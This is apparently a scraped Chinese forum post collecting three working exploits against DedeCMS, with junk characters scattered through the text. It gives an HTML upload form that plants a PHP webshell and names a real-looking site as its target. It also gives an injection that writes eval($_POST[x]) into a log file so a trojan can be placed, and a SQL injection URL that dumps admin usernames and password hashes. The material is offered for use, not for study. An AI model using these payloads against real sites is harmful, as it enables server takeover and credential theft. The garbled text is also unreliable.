8 E6 D% ]8 j, x6 v% l2 }' U8 Y
织梦(Dedecms)select_soft_post.php页面变量未初始漏洞# a, D ]" h0 ?( w4 T! B) r- R3 g h
<html>
) W- W& [) [0 O# e! S& c; N" v<head>1 c8 u) W# P4 d2 e* E) N( \
<title>Dedecms v55 RCE Exploit Codz By flyh4t</title>
; r0 q7 w- c2 Y</head>8 b4 ?+ {. |3 |. ~2 |& q4 o
<body style="FONT-SIZE: 9pt">1 s& t" [0 i! f
---------- Dedecms v55 RCE Exploit Codz By flyh4t---------- <br /><br />; F& F) c5 A$ u) B/ r, O
<form action=http://www.nuanyue.com/uploads/include/dialog/select_soft_post.php method='POST' enctype="multipart/form-data" name='myform'>
) e; p* f: h9 ^+ u<input type='hidden' name='activepath' value='/data/cache/' />( j* } b! J8 \$ p: W0 Q
<input type='hidden' name='cfg_basedir' value='../../' />
+ E9 Y! C& ?# e0 q<input type='hidden' name='cfg_imgtype' value='php' />, B a8 }8 m3 F) ?
<input type='hidden' name='cfg_not_allowall' value='txt' />
4 ]) h% X: V; C$ O# @9 N<input type='hidden' name='cfg_softtype' value='php' />$ ~/ [; a0 Z# K: y x
<input type='hidden' name='cfg_mediatype' value='php' />* D6 }# _% ]( Q
<input type='hidden' name='f' value='form1.enclosure' />( o' I ^ x& s9 c/ ^
<input type='hidden' name='job' value='upload' />- R8 n4 \7 |, Z4 q1 c" I4 K( r) F
<input type='hidden' name='newname' value='fly.php' />
. ^) I6 g; @$ a; Q- z- DSelect U Shell <input type='file' name='uploadfile' size='25' />* s( C2 q" |5 W$ @: H4 f
<input type='submit' name='sb1' value='确定' />
( I$ W f+ d1 v& v8 r</form>" I" ?8 L+ _' V% j
<br />It's just a exp for the bug of Dedecms V55...<br />
! U# y q9 S$ ^# ~5 F( ]9 ]" yNeed register_globals = on...<br /># |; M" c8 i! \
Fun the game,get a webshell at /data/cache/fly.php...<br />
4 g1 r, F* K0 @</body>) c" W5 e1 g% [* N6 o7 i: I5 Q4 R
</html>* ]% g, v% q5 X( D8 h1 p- a/ l
+ E/ g- L. D# N( F9 q6 B+ \
9 T7 ` j! r% ~, u% [4 m3 E; r) E- B( m! ~
2 s: x% {4 v6 N
5 S7 T+ l+ w( j
+ t0 H g1 J: L6 z9 L7 f3 S+ K4 k# R
/ [4 G/ g) f' D6 N7 D! V/ `, g' S2 R4 D8 \/ D3 T
: w0 w! }" o/ v+ e/ _% D' m5 S ]' }5 m/ B+ h5 \+ \# I( Y! R5 E
织梦(dedecms)5.3 – 5.5 plus/digg_frame.php 注入漏洞3 J& n" T: k; h; |6 }8 D9 z
利用了MySQL字段数值溢出引发错误和DEDECMS用PHP记录数据库错误信息并且文件头部没有验证的漏洞。$ z5 z/ [/ I, t2 \. R
1. 访问网址:
X1 F! k3 A( G9 ~http://www.abc.com/plus/digg_fra ... 024%651024&mid=*/eval($_POST[x]);var_dump(3);?>" T- q6 R% L ~. X" ]: r- C8 K
可看见错误信息
- x3 P+ K5 M( k y5 x
. z! B! S5 N3 Y- M" a6 r' a' {
' ~4 v! d& G& _! @5 g2. 访问 http://www.abc.com/data/mysql_error_trace.php 看到以下信息证明注入成功了。
3 R8 C* @2 u2 \int(3) Error: Illegal double '1024e1024' value found during parsing( C3 u0 a& |' U% u& D! g
Error sql: Select goodpost,badpost,scores From `gxeduw_archives` where id=1024e1024 limit 0,1; */ ?>
0 M6 w' ~8 I5 n* C% Y3 f4 A
# w6 q+ c$ n, j1 Q# }
) n% {( e2 \. U* m( X8 Q/ A9 i8 ^3. 执行dede.rar里的文件 test.html,注意 form 中 action 的地址是3 o/ R6 S0 e3 p3 |7 c8 h
' Y- O2 _: `; z
# S' v u( m. U* E<form action=”http://www.abc.com/data/mysql_error_trace.php” enctype=”application/x-www-form-urlencoded” method=”post”>
; W3 }: X2 V0 R, Z- n& I3 {1 v
/ |" u' a7 t/ j. J4 m5 ?; L0 I- b6 G; T, V
按确定后的看到第2步骤的信息表示文件木马上传成功.& r6 K4 N$ E! S ~
2 m; D1 `4 [( o3 u# x& e
' i' h# f& |# r8 ~6 @# J( Q% ^) t
5 E( W" |- k5 j+ H _
" p' a! ~# ^( H& Q3 _
: E+ v/ S6 [+ t1 }% T/ Z
1 L" M+ }! H/ q+ f" Q/ v0 R J' I( O# c" A+ b
. e4 d7 {8 Y3 Y5 `
- m3 W- z0 s I
& C+ |+ B( Q6 U8 E5 u8 V/ m9 e
" X9 x; i/ \ q; Q1 p7 x" }) K0 Q& p* ~4 v
织梦(DedeCms)plus/infosearch.php 文件注入漏洞* U2 B( v+ D6 I1 s$ E/ C0 w
http://localhost/plus/infosearch.php?action=search&q=%cf'%20union%20select%201,2,userid,4,pwd,6%20from%20dede_admin/* |
|
发表于 2012-10-18 10:42:14
收藏
支持
反对